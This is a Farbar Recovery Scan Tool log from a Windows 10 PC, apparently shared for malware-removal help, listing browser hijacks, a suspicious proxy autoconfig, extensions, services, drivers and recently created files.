SearchScopes: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> {1b31c9d2-7135-442b-bb93-7c002172adc6} URL = 
SearchScopes: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_16_19_orgnl&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyDzytBtN1L2XzutAtFtBtCtFtCtFtDtN1L1Czu1M1Q1CtBtBtFtCtFtDtN1L1G1B1V1N2Y1L1Qzu2SyDtA0AtByCtDtB0FtGyEyB0AzytGzzyCtB0FtGyEtCyB0BtGyCyCyCtBtAtAyE0CtD0B0E0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyE%26cr%3D1993093879%26a%3Dhdr_s_16_19_orgnl%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> {E35DF2EC-80F6-42D5-B78E-83DC7BE9544B} URL = hxxps://malaysia.search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Internet Download Manager, Tonec Inc.)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2015-08-27] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2015-08-27] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Internet Download Manager, Tonec Inc.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2015-08-27] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2015-08-27] (Microsoft Corporation)
Toolbar: HKLM - DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files (x86)\DAEMON Tools Toolbar\DTToolbar64.dll No File
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
 
Edge: 
======
Edge HomeButtonPage: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> hxxp://google.com/
 
FireFox:
========
FF DefaultProfile: 41A66E7E5EE1
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\41A66E7E5EE1\Profiles\90kdely9.default [not found]
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\41A66E7E5EE1\Profiles\41A66E7E5EE1 [not found]
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default [2016-08-27]
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\90kdely9.default -> Yahoo! Powered
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\90kdely9.default -> Yahoo! Powered
FF Homepage: Mozilla\Firefox\Profiles\90kdely9.default -> hxxps://malaysia.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fremkfs_16_24&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCtByCtN1L2XzutAtFtBtBtFtAtFzztN1L1Czu1BtCtDtN1L1G1B1V1N2Y1L1Qzu2StBzytC0EtBtAtC0EtGyC0D0D0AtGtDzytC0EtGtAyDtCyEtGtD0D0E0CtAtA0FyCtAyBzy0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyE%26cr%3D964303875%26a%3Dwbf_fremkfs_16_24%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage
FF NewTab: Mozilla\Firefox\Profiles\90kdely9.default -> about:newtab
FF Keyword.URL: Mozilla\Firefox\Profiles\90kdely9.default -> user_pref("keyword.URL", true);
FF Extension: (Windows.Internal.Management) - C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default\Extensions\{A333FFE3-D829-DE59-F118-6BB57102743B} [2016-08-24] [not signed]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default\searchplugins\Search Provided by Yahoo.xml [2016-05-12]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default\searchplugins\yahoo! powered.xml [2016-06-15]
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 [2016-11-28]
FF NewTab: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> Yahoo! Powered
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> Yahoo! Powered
FF Homepage: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> hxxp://www.google.com/
FF Keyword.URL: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> user_pref("keyword.URL", true);
FF NetworkProxy: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> autoconfig_url", "data:text/plain, function FindProxyForURL(url, host) {if(isInNet(host, '192.168.0.0', '255.255.0.0')) return 'DIRECT'; \nif(host == 'us1-base.cd-n.net') return 'DIRECT'; \nif(host == 'us2-base.cd-n.net') return 'DIRECT'; \nif(host == 'us3-base.cd-n.net') return 'DIRECT'; \nif(host == 'jp1-base.cd-n.net') return 'DIRECT'; \nif(host == 'de1-base.cd-n.net') return 'DIRECT'; \nif(host == 'au1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ca1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ir1-base.cd-n.net') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nif(host == 'kr1-base.cd-n.net') return 'DIRECT'; \nif(host == '127.0.0.1') return 'DIRECT'; \nif(host == 'localhost') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nreturn 'HTTPS giydslrsga4c4ojxfyzdkmbdge2doojzgq2tmmbq.mycdns.com:443';}"
FF NetworkProxy: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> type", 0
FF Extension: (Hoxx VPN Proxy) - C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\@hoxx-vpn.xpi [2016-11-18]
FF Extension: (Flash and Video Download) - C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a} [2016-09-28]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\Search Provided by Yahoo.xml [2016-05-12]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yahoo! powered.xml [2016-06-15]
FF HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-03-10]
FF HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\taurus silver\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\taurus silver\AppData\Roaming\IDM\idmmzcc5 [2016-11-28] [not signed]
FF HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2015-08-27] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-04] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-04] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-08-27] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2015-08-27] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 10\npnitromozilla.dll [2015-05-06] (Nitro PDF)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-08] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-08] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\taurus silver\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @talk.google.com/O1DPlugin -> C:\Users\taurus silver\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @tools.google.com/Google Update;version=3 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @tools.google.com/Google Update;version=9 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\taurus silver\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\taurus silver\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)
 
Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.google.com.my/
CHR StartupUrls: ChromeDefaultData -> "hxxps://www.google.com.my/"
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\WidevineCdm\1.4.8.903\_platform_specific\win_x86\widevinecdmadapter.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.166\pepflashplayer.dll => No File
CHR Profile: C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2016-11-26] <==== ATTENTION
CHR Extension: (Kami - PDF and Document Markup) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ecnphlgnajanjnkcmbpancdjoidceilk [2016-11-26]
CHR Extension: (AdBlock) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-11-26]
CHR Extension: (IDM Integration Module) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2016-11-21]
CHR Extension: (Effective Measure Community Plugin) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nkgdmfemjeohjmeeabffnombnpkkogjm [2015-08-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-21]
CHR HKLM\...\Chrome\Extension: [bmlggjgglgmlgbendppbpmkpakefkmkd] - <no Path/update_url>
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-04-16]
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bmlggjgglgmlgbendppbpmkpakefkmkd] - <no Path/update_url>
CHR HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bmlggjgglgmlgbendppbpmkpakefkmkd] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-04-16]
CHR HKLM-x32\...\Chrome\Extension: [npdicihegicnhaangkdmcgbjceoemeoo] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-07-01] (Autodesk Inc.)
R2 ASUS Flip Service; C:\Program Files\ASUS\ASUS FlipLock\FlipService.exe [7680 2014-10-31] (ASUS) [File not signed]
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe [71168 2014-08-20] (ASUS Cloud Corporation) [File not signed]
R2 BBDemon; D:\Catia\intel_a\code\bin\CATSysDemon.exe [36864 2007-05-04] (Dassault Systemes) [File not signed]
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2015-12-30] (BitRaider, LLC)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2848440 2015-07-04] (Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-05-17] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-05-17] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [42096 2016-11-08] (Dropbox, Inc.)
R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [2770312 2016-11-28] (ESET)
R2 ExpressCache; C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe [828656 2013-11-19] (Condusiv Technologies)
R2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [108032 2016-06-09] (Freemake) [File not signed]
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-15] (NVIDIA Corporation)
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-11-16] (Hi-Rez Studios) [File not signed]
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373160 2015-12-19] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-14] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [154584 2014-09-04] (Intel Corporation)
R2 NitroDriverReadSpool10; C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe [324760 2015-05-06] (Nitro PDF Software)
R2 NitroUpdateService; C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe [418968 2015-05-06] ()
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [4362656 2016-02-24] (INCA Internet Co., Ltd.) [File not signed]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-15] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-15] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-15] (NVIDIA Corporation)
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [629648 2016-11-14] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2016-07-01] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1195920 2015-07-26] ()
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2014-09-29] (Atheros) [File not signed]
S2 Thibechmerciph; C:\Program Files (x86)\Sernetynuwuent\anoteshjunerseVerfier.dll [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [76032 2015-10-21] (Advanced Micro Devices, Inc.)
R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4323976 2015-11-18] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\WINDOWS\System32\drivers\AsusTP.sys [101368 2016-03-04] (ASUS Corporation)
S3 BRDriver64_1_3_3_E02B25FC; C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [78088 2015-12-31] (BitRaider)
R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [262792 2016-11-28] (ESET)
R0 edevmon; C:\WINDOWS\System32\DRIVERS\edevmon.sys [199304 2016-11-28] (ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [15488 2016-11-28] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [197248 2016-11-28] (ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [153216 2016-11-28] (ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [208520 2016-11-28] (ESET)
R1 EpfwLWF; C:\WINDOWS\system32\DRIVERS\EpfwLWF.sys [61568 2016-11-28] (ESET)
R0 epfwwfp; C:\WINDOWS\System32\DRIVERS\epfwwfp.sys [84616 2016-11-28] (ESET)
S4 epfwwfpr; C:\WINDOWS\system32\DRIVERS\epfwwfpr.sys [170792 2015-07-30] (ESET)
S3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [31464 2015-08-13] (ELAN Microelectronic Corp.)
R1 excfs; C:\WINDOWS\System32\DRIVERS\excfs.sys [25840 2013-11-19] (Condusiv Technologies)
R0 excsd; C:\WINDOWS\System32\DRIVERS\excsd.sys [117488 2013-11-19] (Condusiv Technologies)
R3 GMLXDFltr01; C:\WINDOWS\system32\drivers\GMLXDFltr01.sys [10752 2014-07-24] (LXD Development, Inc.)
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-12-26] (REALiX™)
R3 iaLPSS_GPIO; C:\WINDOWS\System32\drivers\iaLPSS_GPIO.sys [46856 2015-06-15] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-10-22] (Intel Corporation)
R3 kbfiltr; C:\WINDOWS\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( )
R3 kxspb; C:\WINDOWS\System32\drivers\kxspb.sys [50208 2015-10-08] (Kionix, Inc.)
R1 LUMDriver; C:\Windows\system32\drivers\LUMDriver.sys [24848 2008-01-02] (IBM)
R3 Neo_VPN; C:\WINDOWS\System32\drivers\Neo6_x64_VPN.sys [38216 2016-08-12] (SoftEther Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-15] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [936192 2016-03-08] (Realtek                                            )
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [777944 2016-03-08] (Realsil Semiconductor Corporation)
R1 SeLow; C:\WINDOWS\system32\DRIVERS\SeLow_x64.sys [51024 2016-11-24] (SoftEther Corporation)
S3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [42600 2016-03-08] (Synaptics Incorporated)
S3 taphss6; C:\WINDOWS\System32\drivers\taphss6.sys [42184 2014-11-22] (Anchorfree Inc.)
S3 tapSF0901; C:\WINDOWS\System32\drivers\tapSF0901.sys [39104 2015-07-31] (Spotflux, Inc.)
S3 usbrndis6; C:\WINDOWS\system32\DRIVERS\usb80236.sys [23040 2015-10-30] (Microsoft Corporation)
R1 VBoxUSBMon; C:\WINDOWS\system32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [36808 2016-08-19] (Wellbia.com Co., Ltd.)
S3 08AFB886; \??\C:\ProgramData\0022E94E_tvn [X]
S3 dbx; system32\DRIVERS\dbx.sys [X]
U4 Messenger; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-28 04:37 - 2016-11-28 04:38 - 00000000 ____D C:\FRST
2016-11-28 04:34 - 2016-11-28 04:34 - 00050687 _____ C:\Users\taurus silver\Downloads\FRST.txt
2016-11-28 04:20 - 2016-11-28 04:20 - 00153216 _____ (ESET) C:\WINDOWS\system32\Drivers\ekbdflt.sys
2016-11-28 04:03 - 2016-11-28 04:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2016-11-28 04:03 - 2016-11-28 04:03 - 00000000 ____D C:\ProgramData\ESET
2016-11-28 04:03 - 2016-11-28 04:03 - 00000000 ____D C:\Program Files\ESET
2016-11-28 03:34 - 2016-11-28 03:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\jnwmon.dll
2016-11-28 03:25 - 2016-11-28 03:25 - 00001089 _____ C:\Users\taurus silver\Desktop\DLLSuite.lnk
2016-11-28 03:25 - 2016-11-28 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL Suite 9.0
2016-11-28 03:00 - 2016-11-28 03:00 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\WildTangent
2016-11-28 02:54 - 2016-11-28 02:54 - 00003322 _____ C:\WINDOWS\System32\Tasks\{98E2AC70-B5FB-4270-AB02-FEA0C9C05CB5}
2016-11-28 01:23 - 2016-11-28 03:50 - 00000000 ____D C:\MINIONAPP
2016-11-28 01:23 - 2016-11-28 03:20 - 00000657 _____ C:\Users\taurus silver\Desktop\MINIONAPP.lnk
2016-11-28 01:23 - 2016-11-28 01:23 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MINIONAPP
2016-11-28 00:37 - 2016-11-28 00:37 - 00000000 ____D C:\Users\taurus silver\Documents\WeChat Files
2016-11-27 23:56 - 2016-11-27 23:56 - 00000000 ____D C:\Users\taurus silver\Documents\Guild Wars 2
2016-11-27 20:35 - 2016-11-27 20:35 - 00000000 ____D C:\Users\taurus silver\AppData\Local\MMOMINION
2016-11-26 02:46 - 2016-11-28 03:46 - 00000569 _____ C:\Users\Public\Desktop\Guild Wars 2.lnk
2016-11-26 02:46 - 2016-11-26 02:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guild Wars 2
2016-11-26 02:45 - 2016-11-27 22:01 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Guild Wars 2
